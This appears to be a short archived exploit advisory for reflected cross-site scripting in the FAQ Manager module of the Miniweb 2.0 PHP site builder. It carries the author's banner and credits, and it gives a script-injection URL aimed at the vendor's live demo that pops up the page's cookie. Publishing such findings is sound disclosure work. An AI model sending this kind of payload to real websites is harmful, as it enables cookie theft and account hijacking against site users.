The FAQ Manager module for Miniweb version 2.0 suffers from cross site scripting vulnerabilities.
c67161a57e4dcd8e1bffe24875c6cf44dc5bee095970b1f2b0875173e00c42a1
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[»] Miniweb 2.0 Module (FAQ Manager) Remote XSS Vulnerabilities
==============================================================================
[»] Script: [ Miniweb 2.0 ]
[»] Language: [ PHP ]
[»] Download: [ https://www.miniweb2.com/index.php?module=sitebuilder&sitebuilder_id=17 ]
[»] Founder: [ Moudi <m0udi@9.cn> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[»] Team: [ EvilWay ]
[»] Dork: [ OFF ]
[»] Price: [ $250.00 ]
[»] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit XSS + LIVE : vulnerability ]===
[»] https://www.site.com/patch/index.php/[XSS]
[»] https://www.miniweb2.com/moduledemo/faqmanager/index.php/"><script>alert(document.cookie);</script>
Note: have some other XSS on index.php ..
Author: Moudi
###########################################################################